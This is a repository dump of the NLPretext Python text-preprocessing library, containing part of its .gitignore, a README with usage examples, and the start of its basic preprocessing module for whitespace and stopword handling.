file 101 | .idea/caches/build_file_checksums.ser 102 | 103 | ### PyCharm Patch ### 104 | # Comment Reason: https://github.com/joeblau/gitignore.io/issues/186#issuecomment-215987721 105 | 106 | # *.iml 107 | # modules.xml 108 | # .idea/misc.xml 109 | # *.ipr 110 | 111 | # Sonarlint plugin 112 | .idea/**/sonarlint/ 113 | 114 | # SonarQube Plugin 115 | .idea/**/sonarIssues.xml 116 | 117 | # Markdown Navigator plugin 118 | .idea/**/markdown-navigator.xml 119 | .idea/**/markdown-navigator/ 120 | 121 | ### Python ### 122 | # Byte-compiled / optimized / DLL files 123 | __pycache__/ 124 | *.py[cod] 125 | *$py.class 126 | 127 | # C extensions 128 | *.so 129 | 130 | # Distribution / packaging 131 | .Python 132 | env/ 133 | build/ 134 | develop-eggs/ 135 | dist/ 136 | downloads/ 137 | eggs/ 138 | .eggs/ 139 | lib/ 140 | lib64/ 141 | parts/ 142 | sdist/ 143 | var/ 144 | wheels/ 145 | pip-wheel-metadata/ 146 | share/python-wheels/ 147 | *.egg-info/ 148 | .installed.cfg 149 | *.egg 150 | MANIFEST 151 | 152 | # PyInstaller 153 | # Usually these files are written by a python script from a template 154 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 155 | *.manifest 156 | *.spec 157 | 158 | # Installer logs 159 | pip-log.txt 160 | pip-delete-this-directory.txt 161 | 162 | # Unit test / coverage reports 163 | htmlcov/ 164 | .tox/ 165 | .nox/ 166 | .coverage 167 | .coverage.* 168 | .cache 169 | nosetests.xml 170 | coverage.xml 171 | *.cover 172 | .hypothesis/ 173 | .pytest_cache/ 174 | .ruff_cache/ 175 | 176 | # Translations 177 | *.mo 178 | *.pot 179 | 180 | # Scrapy stuff: 181 | .scrapy 182 | 183 | # Django stuff: 184 | *.log 185 | 186 | # Sphinx documentation 187 | docs/_build/ 188 | 189 | # PyBuilder 190 | target/ 191 | 192 | # pyenv 193 | .python-version 194 | 195 | # poetry 196 | .venv 197 | 198 | # pipenv 199 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 200 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 201 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 202 | # install all needed dependencies. 203 | #Pipfile.lock 204 | 205 | # celery beat schedule file 206 | celerybeat-schedule 207 | 208 | # SageMath parsed files 209 | *.sage.py 210 | 211 | # Spyder project settings 212 | .spyderproject 213 | .spyproject 214 | 215 | # Rope project settings 216 | .ropeproject 217 | 218 | # Mr Developer 219 | .mr.developer.cfg 220 | .project 221 | .pydevproject 222 | 223 | # mkdocs documentation 224 | /site 225 | 226 | # mypy 227 | .mypy_cache/ 228 | .dmypy.json 229 | dmypy.json 230 | 231 | # Pyre type checker 232 | .pyre/ 233 | 234 | # Plugins 235 | .secrets.baseline 236 | 237 | ### VisualStudioCode ### 238 | .vscode/* 239 | !.vscode/tasks.json 240 | !.vscode/launch.json 241 | !.vscode/extensions.json 242 | 243 | ### VisualStudioCode Patch ### 244 | # Ignore all local history of files 245 | .history 246 | 247 | ### Windows ### 248 | # Windows thumbnail cache files 249 | Thumbs.db 250 | Thumbs.db:encryptable 251 | ehthumbs.db 252 | ehthumbs_vista.db 253 | 254 | # Dump file 255 | *.stackdump 256 | 257 | # Folder config file 258 | [Dd]esktop.ini 259 | 260 | # Recycle Bin used on file shares 261 | $RECYCLE.BIN/ 262 | 263 | # Windows Installer files 264 | *.cab 265 | *.msi 266 | *.msix 267 | *.msm 268 | *.msp 269 | 270 | # Windows shortcuts 271 | *.lnk 272 | 273 | ### VisualStudio ### 274 | ## Ignore Visual Studio temporary files, build results, and 275 | ## files generated by popular Visual Studio add-ons. 276 | ## 277 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 278 | 279 | # User-specific files 280 | *.rsuser 281 | *.suo 282 | *.user 283 | *.userosscache 284 | *.sln.docstates 285 | 286 | # User-specific files (MonoDevelop/Xamarin Studio) 287 | *.userprefs 288 | 289 | # Mono auto generated files 290 | mono_crash.* 291 | 292 | # Build results 293 | [Dd]ebug/ 294 | [Dd]ebugPublic/ 295 | [Rr]elease/ 296 | [Rr]eleases/ 297 | x64/ 298 | x86/ 299 | [Aa][Rr][Mm]/ 300 | [Aa][Rr][Mm]64/ 301 | bld/ 302 | [Bb]in/ 303 | [Oo]bj/ 304 | [Ll]og/ 305 | 306 | # Visual Studio 2015/2017 cache/options directory 307 | .vs/ 308 | # Uncomment if you have tasks that create the project's static files in wwwroot 309 | #wwwroot/ 310 | 311 | # Visual Studio 2017 auto generated files 312 | Generated\ Files/ 313 | 314 | # MSTest test Results 315 | [Tt]est[Rr]esult*/ 316 | [Bb]uild[Ll]og.* 317 | 318 | # NUnit 319 | *.VisualState.xml 320 | TestResult.xml 321 | nunit-*.xml 322 | 323 | # Build Results of an ATL Project 324 | [Dd]ebugPS/ 325 | [Rr]eleasePS/ 326 | dlldata.c 327 | 328 | # Benchmark Results 329 | BenchmarkDotNet.Artifacts/ 330 | 331 | # .NET Core 332 | project.lock.json 333 | project.fragment.lock.json 334 | artifacts/ 335 | 336 | # StyleCop 337 | StyleCopReport.xml 338 | 339 | # Files built by Visual Studio 340 | *_i.c 341 | *_p.c 342 | *_h.h 343 | *.ilk 344 | *.obj 345 | *.iobj 346 | *.pch 347 | *.pdb 348 | *.ipdb 349 | *.pgc 350 | *.pgd 351 | *.rsp 352 | *.sbr 353 | *.tlb 354 | *.tli 355 | *.tlh 356 | *.tmp 357 | *.tmp_proj 358 | *_wpftmp.csproj 359 | *.vspscc 360 | *.vssscc 361 | .builds 362 | *.pidb 363 | *.svclog 364 | *.scc 365 | 366 | # Chutzpah Test files 367 | _Chutzpah* 368 | 369 | # Visual C++ cache files 370 | ipch/ 371 | *.aps 372 | *.ncb 373 | *.opendb 374 | *.opensdf 375 | *.sdf 376 | *.cachefile 377 | *.VC.db 378 | *.VC.VC.opendb 379 | 380 | # Visual Studio profiler 381 | *.psess 382 | *.vsp 383 | *.vspx 384 | *.sap 385 | 386 | # Visual Studio Trace Files 387 | *.e2e 388 | 389 | # TFS 2012 Local Workspace 390 | $tf/ 391 | 392 | # Guidance Automation Toolkit 393 | *.gpState 394 | 395 | # ReSharper is a .NET coding add-in 396 | _ReSharper*/ 397 | *.[Rr]e[Ss]harper 398 | *.DotSettings.user 399 | 400 | # JustCode is a .NET coding add-in 401 | .JustCode 402 | 403 | # TeamCity is a build add-in 404 | _TeamCity* 405 | 406 | # DotCover is a Code Coverage Tool 407 | *.dotCover 408 | 409 | # AxoCover is a Code Coverage Tool 410 | .axoCover/* 411 | !.axoCover/settings.json 412 | 413 | # Visual Studio code coverage results 414 | *.coverage 415 | *.coveragexml 416 | 417 | # NCrunch 418 | _NCrunch_* 419 | .*crunch*.local.xml 420 | nCrunchTemp_* 421 | 422 | # MightyMoose 423 | *.mm.* 424 | AutoTest.Net/ 425 | 426 | # Web workbench (sass) 427 | .sass-cache/ 428 | 429 | # Installshield output folder 430 | [Ee]xpress/ 431 | 432 | # DocProject is a documentation generator add-in 433 | DocProject/buildhelp/ 434 | DocProject/Help/*.HxT 435 | DocProject/Help/*.HxC 436 | DocProject/Help/*.hhc 437 | DocProject/Help/*.hhk 438 | DocProject/Help/*.hhp 439 | DocProject/Help/Html2 440 | DocProject/Help/html 441 | 442 | # Click-Once directory 443 | publish/ 444 | 445 | # Publish Web Output 446 | *.[Pp]ublish.xml 447 | *.azurePubxml 448 | # Note: Comment the next line if you want to checkin your web deploy settings, 449 | # but database connection strings (with potential passwords) will be unencrypted 450 | *.pubxml 451 | *.publishproj 452 | 453 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 454 | # checkin your Azure Web App publish settings, but sensitive information contained 455 | # in these scripts will be unencrypted 456 | PublishScripts/ 457 | 458 | # NuGet Packages 459 | *.nupkg 460 | # NuGet Symbol Packages 461 | *.snupkg 462 | # The packages folder can be ignored because of Package Restore 463 | **/[Pp]ackages/* 464 | # except build/, which is used as an MSBuild target. 465 | !**/[Pp]ackages/build/ 466 | # Uncomment if necessary however generally it will be regenerated when needed 467 | #!**/[Pp]ackages/repositories.config 468 | # NuGet v3's project.json files produces more ignorable files 469 | *.nuget.props 470 | *.nuget.targets 471 | 472 | # Microsoft Azure Build Output 473 | csx/ 474 | *.build.csdef 475 | 476 | # Microsoft Azure Emulator 477 | ecf/ 478 | rcf/ 479 | 480 | # Windows Store app package directories and files 481 | AppPackages/ 482 | BundleArtifacts/ 483 | Package.StoreAssociation.xml 484 | _pkginfo.txt 485 | *.appx 486 | *.appxbundle 487 | *.appxupload 488 | 489 | # Visual Studio cache files 490 | # files ending in .cache can be ignored 491 | *.[Cc]ache 492 | # but keep track of directories ending in .cache 493 | !?*.[Cc]ache/ 494 | 495 | # Others 496 | ClientBin/ 497 | ~$* 498 | *~ 499 | *.dbmdl 500 | *.dbproj.schemaview 501 | *.jfm 502 | *.pfx 503 | *.publishsettings 504 | orleans.codegen.cs 505 | 506 | # Including strong name files can present a security risk 507 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 508 | #*.snk 509 | 510 | # Since there are multiple workflows, uncomment next line to ignore bower_components 511 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 512 | #bower_components/ 513 | 514 | # RIA/Silverlight projects 515 | Generated_Code/ 516 | 517 | # Backup & report files from converting an old project file 518 | # to a newer Visual Studio version. Backup files are not needed, 519 | # because we have git ;-) 520 | _UpgradeReport_Files/ 521 | Backup*/ 522 | UpgradeLog*.XML 523 | UpgradeLog*.htm 524 | ServiceFabricBackup/ 525 | *.rptproj.bak 526 | 527 | # SQL Server files 528 | *.mdf 529 | *.ldf 530 | *.ndf 531 | 532 | # Business Intelligence projects 533 | *.rdl.data 534 | *.bim.layout 535 | *.bim_*.settings 536 | *.rptproj.rsuser 537 | *- [Bb]ackup.rdl 538 | *- [Bb]ackup ([0-9]).rdl 539 | *- [Bb]ackup ([0-9][0-9]).rdl 540 | 541 | # Microsoft Fakes 542 | FakesAssemblies/ 543 | 544 | # GhostDoc plugin setting file 545 | *.GhostDoc.xml 546 | 547 | # Node.js Tools for Visual Studio 548 | .ntvs_analysis.dat 549 | node_modules/ 550 | 551 | # Visual Studio 6 build log 552 | *.plg 553 | 554 | # Visual Studio 6 workspace options file 555 | *.opt 556 | 557 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 558 | *.vbw 559 | 560 | # Visual Studio LightSwitch build output 561 | **/*.HTMLClient/GeneratedArtifacts 562 | **/*.DesktopClient/GeneratedArtifacts 563 | **/*.DesktopClient/ModelManifest.xml 564 | **/*.Server/GeneratedArtifacts 565 | **/*.Server/ModelManifest.xml 566 | _Pvt_Extensions 567 | 568 | # Paket dependency manager 569 | .paket/paket.exe 570 | paket-files/ 571 | 572 | # FAKE - F# Make 573 | .fake/ 574 | 575 | # CodeRush personal settings 576 | .cr/personal 577 | 578 | # Python Tools for Visual Studio (PTVS) 579 | *.pyc 580 | 581 | # Cake - Uncomment if you are using it 582 | # tools/** 583 | # !tools/packages.config 584 | 585 | # Tabs Studio 586 | *.tss 587 | 588 | # Telerik's JustMock configuration file 589 | *.jmconfig 590 | 591 | # BizTalk build output 592 | *.btp.cs 593 | *.btm.cs 594 | *.odx.cs 595 | *.xsd.cs 596 | 597 | # OpenCover UI analysis results 598 | OpenCover/ 599 | 600 | # Azure Stream Analytics local run output 601 | ASALocalRun/ 602 | 603 | # MSBuild Binary and Structured Log 604 | *.binlog 605 | 606 | # NVidia Nsight GPU debugger configuration file 607 | *.nvuser 608 | 609 | # MFractors (Xamarin productivity tool) working folder 610 | .mfractor/ 611 | 612 | # Local History for Visual Studio 613 | .localhistory/ 614 | 615 | # BeatPulse healthcheck temp database 616 | healthchecksdb 617 | 618 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 619 | MigrationBackup/ 620 | 621 | # DotEnv configuration 622 | .env 623 | 624 | # Database 625 | *.db 626 | *.rdb 627 | 628 | # Pycharm 629 | .idea 630 | venv/ 631 | 632 | # VS Code 633 | .vscode/ 634 | 635 | # Spyder 636 | .spyproject/ 637 | 638 | # Jupyter NB Checkpoints 639 | .ipynb_checkpoints/ 640 | 641 | # exclude data from source control by default 642 | 643 | 644 | # vim 645 | *.swp 646 | *.swo 647 | 648 | data/ 649 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NLPretext 2 | 3 |

4 | 5 |

6 | 7 |
8 | 9 | [![CI status](https://github.com/artefactory/NLPretext/actions/workflows/ci.yml/badge.svg?branch%3Amain&event%3Apush)](https://github.com/artefactory/NLPretext/actions/workflows/ci.yml?query=branch%3Amain) 10 | [![CD status](https://github.com/artefactory/NLPretext/actions/workflows/cd.yml/badge.svg?event%3Arelease)](https://github.com/artefactory/NLPretext/actions/workflows/cd.yml?query=event%3Arelease) 11 | [![Python Version](https://img.shields.io/badge/Python-3.8-informational.svg)](#supported-python-versions) 12 | [![Dependencies Status](https://img.shields.io/badge/dependabots-active-informational.svg)](https://github.com/artefactory/NLPretext}/pulls?utf8=%E2%9C%93&q=is%3Apr%20author%3Aapp%2Fdependabot) 13 | 14 | [![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black) 15 | [![Security: bandit](https://img.shields.io/badge/security-bandit-informational.svg)](https://github.com/PyCQA/bandit) 16 | [![Pre-commit](https://img.shields.io/badge/pre--commit-enabled-informational?logo=pre-commit&logoColor=white)](https://github.com/artefactory/NLPretext}/blob/main/.pre-commit-config.yaml) 17 | [![Semantic Versions](https://img.shields.io/badge/%F0%9F%9A%80-semantic%20versions-informational.svg)](https://github.com/artefactory/NLPretext/releases) 18 | [![Documentation](https://img.shields.io/badge/doc-sphinx-informational.svg)](https://github.com/artefactory/NLPretext}/tree/main/docs) 19 | [![License](https://img.shields.io/badge/License-Apache%20Software%20License%202.0-informational.svg)](https://github.com/artefactory/NLPretext}/blob/main/LICENSE) 20 | 21 | All the goto functions you need to handle NLP use-cases, integrated in NLPretext 22 | 23 |
24 | 25 | # TL;DR 26 | 27 | 28 | > *Working on an NLP project and tired of always looking for the same silly preprocessing functions on the web?* :tired_face: 29 | 30 | > *Need to efficiently extract email adresses from a document? Hashtags from tweets? Remove accents from a French post?* :disappointed_relieved: 31 | 32 | 33 | **NLPretext got you covered!** :rocket: 34 | 35 | NLPretext packages in a **unique** library all the text **preprocessing** functions you need to **ease** your NLP project. 36 | 37 | 38 | :mag: Quickly explore below our preprocessing pipelines and individual functions referential. 39 | 40 | * [Default preprocessing pipeline](#default_pipeline) 41 | * [Custom preprocessing pipeline](#custom_pipeline) 42 | * [Replacing phone numbers](#replace_phone_numbers) 43 | * [Removing hashtags](#remove_hashtags) 44 | * [Extracting emojis](#extract_emojis) 45 | * [Data augmentation](#data_augmentation) 46 | 47 | 48 | Cannot find what you were looking for? Feel free to open an [issue]((https://github.com/artefactory/nlpretext/issues) ). 49 | 50 | 51 | 52 | # Installation 53 | 54 | ### Supported Python Versions 55 | 56 | - Main version supported : `3.8` 57 | - Other supported versions : `3.9`, `3.10` 58 | 59 | 60 | We strongly advise you to do the remaining steps in a virtual environnement. 61 | 62 | To install this library from PyPi, run the following command: 63 | 64 | ```bash 65 | pip install nlpretext 66 | ``` 67 | 68 | or with `Poetry` 69 | 70 | ```bash 71 | poetry add nlpretext 72 | ``` 73 | 74 | 75 | # Usage 76 | 77 | ## Default pipeline 78 | 79 | Need to preprocess your text data but no clue about what function to use and in which order? The default preprocessing pipeline got you covered: 80 | 81 | ```python 82 | from nlpretext import Preprocessor 83 | text = "I just got the best dinner in my life @latourdargent !!! I recommend 😀 #food #paris \n" 84 | preprocessor = Preprocessor() 85 | text = preprocessor.run(text) 86 | print(text) 87 | # "I just got the best dinner in my life!!! I recommend" 88 | ``` 89 | 90 | ## Create your custom pipeline 91 | 92 | Another possibility is to create your custom pipeline if you know exactly what function to apply on your data, here's an example: 93 | 94 | ```python 95 | from nlpretext import Preprocessor 96 | from nlpretext.basic.preprocess import (normalize_whitespace, remove_punct, remove_eol_characters, 97 | remove_stopwords, lower_text) 98 | from nlpretext.social.preprocess import remove_mentions, remove_hashtag, remove_emoji 99 | text = "I just got the best dinner in my life @latourdargent !!! I recommend 😀 #food #paris \n" 100 | preprocessor = Preprocessor() 101 | preprocessor.pipe(lower_text) 102 | preprocessor.pipe(remove_mentions) 103 | preprocessor.pipe(remove_hashtag) 104 | preprocessor.pipe(remove_emoji) 105 | preprocessor.pipe(remove_eol_characters) 106 | preprocessor.pipe(remove_stopwords, args={'lang': 'en'}) 107 | preprocessor.pipe(remove_punct) 108 | preprocessor.pipe(normalize_whitespace) 109 | text = preprocessor.run(text) 110 | print(text) 111 | # "dinner life recommend" 112 | ``` 113 | 114 | Take a look at all the functions that are available [here](https://github.com/artefactory/NLPretext/tree/master/nlpretext) in the ```preprocess.py``` scripts in the different folders: basic, social, token. 115 | 116 | 117 | ## Load text data 118 | 119 | Pre-processing text data is useful only if you have loaded data to process! Importing text data as strings in your code can be really simple if you have short texts contained in a local .txt, but it can quickly become difficult if you want to load a lot of texts, stored in multiple formats and divided in multiple files. Hopefully, you can use NLPretext's TextLoader class to easily import text data. 120 | while it is not mandatory our textLoader work best with dask, make sure to have the librairy installed if you want the best performances. 121 | 122 | ```python 123 | from nlpretext.textloader import TextLoader 124 | files_path = "local_folder/texts/text.txt" 125 | text_loader = TextLoader(use_dask=True) 126 | text_dataframe = text_loader.read_text(files_path) 127 | print(text_dataframe.text.values.tolist()) 128 | # ["I just got the best dinner in my life!!!", "I recommend", "It was awesome"] 129 | ``` 130 | 131 | File path can be provided as string, list of strings, with or without wildcards. It also supports imports from cloud providers, if your machine is authentified on a project. 132 | 133 | ```python 134 | text_loader = TextLoader(text_column="name_of_text_column_in_your_data") 135 | 136 | local_file_path = "local_folder/texts/text.csv" # File from local folder 137 | local_corpus_path = ["local_folder/texts/text_1.csv", "local_folder/texts/text_2.csv", "local_folder/texts/text_3.csv"] # Multiple files from local folder 138 | 139 | gcs_file_path = "gs://my-bucket/texts/text.json" # File from GCS 140 | s3_file_path = "s3://my-bucket/texts/text.json" # File from S3 141 | hdfs_file_path = "hdfs://folder/texts/text.txt" # File from HDFS 142 | azure_file_path = "az://my-bucket/texts/text.parquet" # File from Azure 143 | 144 | gcs_corpus_path = "gs://my-bucket/texts/text_*.json" # Multiple files from GCS with wildcard 145 | 146 | text_dataframe_1 = text_loader.read_text(local_file_path) 147 | text_dataframe_2 = text_loader.read_text(local_corpus_path) 148 | text_dataframe_3 = text_loader.read_text(gcs_file_path) 149 | text_dataframe_4 = text_loader.read_text(s3_file_path) 150 | text_dataframe_5 = text_loader.read_text(hdfs_file_path) 151 | text_dataframe_6 = text_loader.read_text(azure_file_path) 152 | text_dataframe_7 = text_loader.read_text(gcs_corpus_path) 153 | 154 | ``` 155 | 156 | You can also specify a Preprocessor if you want your data to be directly pre-processed when loaded. 157 | ```python 158 | text_loader = TextLoader(text_column="text_col") 159 | preprocessor = Preprocessor() 160 | 161 | file_path = "local_folder/texts/text.csv" # File from local folder 162 | 163 | raw_text_dataframe = text_loader.read_text(local_file_path) 164 | preprocessed_text_dataframe = text_loader.read_text(local_file_path, preprocessor=preprocessor) 165 | 166 | print(raw_text_dataframe.text_col.values.tolist()) 167 | # ["These texts are not preprocessed", "This is bad ## "] 168 | 169 | print(preprocessed_text_dataframe.text_col.values.tolist()) 170 | # ["These texts are not preprocessed", "This is bad"] 171 | ``` 172 | 173 | 174 | ## Individual Functions 175 | 176 | ### Replacing emails 177 | 178 | ```python 179 | from nlpretext.basic.preprocess import replace_emails 180 | example = "I have forwarded this email to obama@whitehouse.gov" 181 | example = replace_emails(example, replace_with="*EMAIL*") 182 | print(example) 183 | # "I have forwarded this email to *EMAIL*" 184 | ``` 185 | 186 | ### Replacing phone numbers 187 | 188 | ```python 189 | from nlpretext.basic.preprocess import replace_phone_numbers 190 | example = "My phone number is 0606060606" 191 | example = replace_phone_numbers(example, country_to_detect=["FR"], replace_with="*PHONE*") 192 | print(example) 193 | # "My phone number is *PHONE*" 194 | ``` 195 | 196 | ### Removing Hashtags 197 | 198 | ```python 199 | from nlpretext.social.preprocess import remove_hashtag 200 | example = "This restaurant was amazing #food #foodie #foodstagram #dinner" 201 | example = remove_hashtag(example) 202 | print(example) 203 | # "This restaurant was amazing" 204 | ``` 205 | 206 | ### Extracting emojis 207 | 208 | ```python 209 | from nlpretext.social.preprocess import extract_emojis 210 | example = "I take care of my skin 😀" 211 | example = extract_emojis(example) 212 | print(example) 213 | # [':grinning_face:'] 214 | ``` 215 | 216 | ## Data augmentation 217 | 218 | The augmentation module helps you to **generate new texts** based on your given examples by modifying some words in the initial ones and to **keep associated entities unchanged**, if any, in the case of **NER tasks**. If you want words other than entities to remain unchanged, you can specify it within the `stopwords` argument. Modifications depend on the chosen method, the ones currently supported by the module are **substitutions with synonyms** using Wordnet or BERT from the [`nlpaug`](https://github.com/makcedward/nlpaug) library. 219 | 220 | ```python 221 | from nlpretext.augmentation.text_augmentation import augment_text 222 | example = "I want to buy a small black handbag please." 223 | entities = [{'entity': 'Color', 'word': 'black', 'startCharIndex': 22, 'endCharIndex': 27}] 224 | example = augment_text(example, method=”wordnet_synonym”, entities=entities) 225 | print(example) 226 | # "I need to buy a small black pocketbook please." 227 | ``` 228 | 229 | 230 | 231 | 232 | # 📈 Releases 233 | 234 | You can see the list of available releases on the [GitHub Releases](https://github.com/artefactory/NLPretext}/releases) page. 235 | 236 | We follow [Semantic Versions](https://semver.org/) specification. 237 | 238 | We use [`Release Drafter`](https://github.com/marketplace/actions/release-drafter). As pull requests are merged, a draft release is kept up-to-date listing the changes, ready to publish when you’re ready. With the categories option, you can categorize pull requests in release notes using labels. 239 | 240 | For Pull Requests, these labels are configured, by default: 241 | 242 | | **Label** | **Title in Releases** | 243 | | :-----------------------------------: | :---------------------: | 244 | | `enhancement`, `feature` | 🚀 Features | 245 | | `bug`, `refactoring`, `bugfix`, `fix` | 🔧 Fixes & Refactoring | 246 | | `build`, `ci`, `testing` | 📦 Build System & CI/CD | 247 | | `breaking` | 💥 Breaking Changes | 248 | | `documentation` | 📝 Documentation | 249 | | `dependencies` | ⬆️ Dependencies updates | 250 | 251 | 252 | GitHub creates the `bug`, `enhancement`, and `documentation` labels automatically. Dependabot creates the `dependencies` label. Create the remaining labels on the Issues tab of the GitHub repository, when needed.## 🛡 License 253 | 254 | [![License](https://img.shields.io/github/license/artefactory/NLPretext)](https://github.com/artefactory/NLPretext}/blob/main/LICENSE) 255 | 256 | This project is licensed under the terms of the `Apache Software License 2.0` license. See [LICENSE](https://github.com/artefactory/NLPretext}/blob/main/LICENSE) for more details.## 📃 Citation 257 | 258 | ``` 259 | @misc{nlpretext, 260 | author = {artefactory}, 261 | title = {All the goto functions you need to handle NLP use-cases, integrated in NLPretext}, 262 | year = {2021}, 263 | publisher = {GitHub}, 264 | journal = {GitHub repository}, 265 | howpublished = {\url{https://github.com/artefactory/NLPretext}}} 266 | } 267 | ``` 268 | 269 | 270 | # Project Organization 271 | ------------ 272 | 273 | . 274 | ├── .github/workflows <- Where the CI and CD lives 275 | ├── datasets/external <- Bash scripts to download external datasets 276 | ├── docker <- All you need to build a Docker image from that package 277 | ├── docs <- Sphinx HTML documentation 278 | ├── nlpretext <- Main Package. This is where the code lives 279 | │   ├── preprocessor.py <- Main preprocessing script 280 | │   ├── text_loader.py <- Main loading script 281 | │   ├── augmentation <- Text augmentation script 282 | │   ├── basic <- Basic text preprocessing 283 | │   ├── cli <- Command lines that can be used 284 | │   ├── social <- Social text preprocessing 285 | │   ├── token <- Token text preprocessing 286 | │  ├── textloader <- File loading 287 | │   ├── _config <- Where the configuration and constants live 288 | │   └── _utils <- Where preprocessing utils scripts lives 289 | ├── references <- assets 290 | ├── tests <- Where the tests lives 291 | ├── .gitignore 292 | ├── .pre-commit-config.yaml <- Pre-commit configuration 293 | ├── CODE_OF_CONDUCT.md <- Code of conduct guidelines 294 | ├── CONTRIBUTING.md <- Contribution guidelines 295 | ├── LICENSE 296 | ├── Makefile 297 | ├── pyproject.toml <- Package build configuration 298 | ├── README.md <- The top-level README for developers using this project. 299 | └── SECURITY.md 300 | 301 | # Credits 302 | 303 | - [textacy](https://github.com/chartbeat-labs/textacy) for the following basic preprocessing functions: 304 | - `fix_bad_unicode` 305 | - `normalize_whitespace` 306 | - `unpack_english_contractions` 307 | - `replace_urls` 308 | - `replace_emails` 309 | - `replace_numbers` 310 | - `replace_currency_symbols` 311 | - `remove_punct` 312 | - `remove_accents` 313 | - `replace_phone_numbers` *(with some modifications of our own)* 314 | -------------------------------------------------------------------------------- /nlpretext/basic/preprocess.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2020 Artefact 2 | # licence-information@artefact.com 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License 15 | 16 | 17 | from typing import List, Optional 18 | 19 | import re 20 | import unicodedata 21 | 22 | from flashtext import KeywordProcessor 23 | from ftfy import fix_text as _fix_text 24 | from nlpretext._config import constants 25 | from nlpretext._utils.phone_number import extract_phone_numbers as _extract_phone_numbers 26 | from nlpretext._utils.stopwords import get_stopwords 27 | from nlpretext.token.tokenizer import tokenize 28 | 29 | 30 | def normalize_whitespace(text: str) -> str: 31 | """ 32 | ---- 33 | Copyright 2016 Chartbeat, Inc. 34 | Code from textacy: https://github.com/chartbeat-labs/textacy 35 | ---- 36 | 37 | Given ``text`` str, replace one or more spacings with a single space, and 38 | one or more linebreaks with a single newline. Also strip leading/trailing 39 | whitespace. 40 | eg. " foo bar " -> "foo bar" 41 | 42 | Parameters 43 | ---------- 44 | text : string 45 | 46 | Returns 47 | ------- 48 | string 49 | """ 50 | text = constants.NONBREAKING_SPACE_REGEX.sub( 51 | " ", constants.LINEBREAK_REGEX.sub(r"\n", text) 52 | ).strip() 53 | return text 54 | 55 | 56 | def remove_whitespace(text: str) -> str: 57 | """ 58 | Given ``text`` str, remove one or more spacings and linebreaks. 59 | Also strip leading/trailing whitespace. 60 | eg. " foo bar " -> "foobar". 61 | 62 | Parameters 63 | ---------- 64 | text : string 65 | 66 | Returns 67 | ------- 68 | string 69 | """ 70 | return constants.NONBREAKING_SPACE_REGEX.sub( 71 | "", constants.LINEBREAK_REGEX.sub("", text) 72 | ).strip() 73 | 74 | 75 | def lower_text(text: str) -> str: 76 | """ 77 | Given ``text`` str, transform it into lowercase. 78 | 79 | Parameters 80 | ---------- 81 | text : string 82 | 83 | Returns 84 | ------- 85 | string 86 | """ 87 | return text.lower() 88 | 89 | 90 | def filter_groups(token: str, ignored_stopwords: Optional[List[str]] = None) -> str: 91 | """ 92 | Given ``token`` str and a list of groups of words 93 | that were concatenated into tokens, reverses the tokens 94 | to their ungrouped state. 95 | 96 | Parameters 97 | ---------- 98 | token : string 99 | ignored_stopwords : list of strings 100 | 101 | Returns 102 | ------- 103 | string 104 | """ 105 | if ignored_stopwords: 106 | for group in ignored_stopwords: 107 | if token == remove_whitespace(group): 108 | token = group 109 | return token 110 | 111 | 112 | def ungroup_ignored_stopwords( 113 | tokens: List[str], ignored_stopwords: Optional[List[str]] = None 114 | ) -> List[str]: 115 | """ 116 | Given ``tokens`` list of str and a list of groups of words 117 | that are concatenated in tokens, reverses the tokens to 118 | their ungrouped state. 119 | 120 | Parameters 121 | ---------- 122 | tokens : list of strings 123 | ignored_stopwords : list of strings 124 | 125 | Returns 126 | ------- 127 | list of strings 128 | """ 129 | return [filter_groups(token, ignored_stopwords) for token in tokens] 130 | 131 | 132 | def remove_stopwords( 133 | text: str, 134 | lang: str, 135 | custom_stopwords: Optional[List[str]] = None, 136 | ignored_stopwords: Optional[List[str]] = None, 137 | ) -> str: 138 | """ 139 | Given ``text`` str, remove classic stopwords for a given language and 140 | custom stopwords given as a list. Words and groups of words from 141 | ignored_stopwords list are ignored during stopwords removal. 142 | 143 | Parameters 144 | ---------- 145 | text : string 146 | lang : string 147 | custom_stopwords : list of strings 148 | ignored_stopwords : list of strings 149 | 150 | Returns 151 | ------- 152 | string 153 | 154 | Raises 155 | ------ 156 | ValueError 157 | if ``custom_stopwords`` and ``ignored_stopwords`` have common elements. 158 | """ 159 | if custom_stopwords and ignored_stopwords: 160 | common_elements = set(custom_stopwords).intersection(set(ignored_stopwords)) 161 | if common_elements != set(): 162 | raise ValueError( 163 | f"Found common words in custom_stopwords and ignored_stopwords: \ 164 | {common_elements}. Please remove duplicated values." 165 | ) 166 | stopwords = get_stopwords(lang) 167 | if ignored_stopwords: 168 | keyword_processor = KeywordProcessor() 169 | singletons_to_keep = [x for x in ignored_stopwords if len(x.split()) == 1] 170 | for group_of_words in ignored_stopwords: 171 | keyword_processor.add_keyword(group_of_words, remove_whitespace(group_of_words)) 172 | text = keyword_processor.replace_keywords(text) 173 | else: 174 | singletons_to_keep = [] 175 | if custom_stopwords: 176 | stopwords += custom_stopwords 177 | if not text: 178 | raise ValueError("Found empty text. Please fix it before using this function.") 179 | if lang in ["fr", "en"]: 180 | lang_module = {"fr": "fr_spacy", "en": "en_spacy"}[lang] 181 | tokens = tokenize(text, lang_module) 182 | else: 183 | tokens = text.split() 184 | tokens = [t for t in tokens if (t not in stopwords or t in singletons_to_keep)] 185 | tokens = ungroup_ignored_stopwords(tokens, ignored_stopwords) 186 | return " ".join(tokens) 187 | 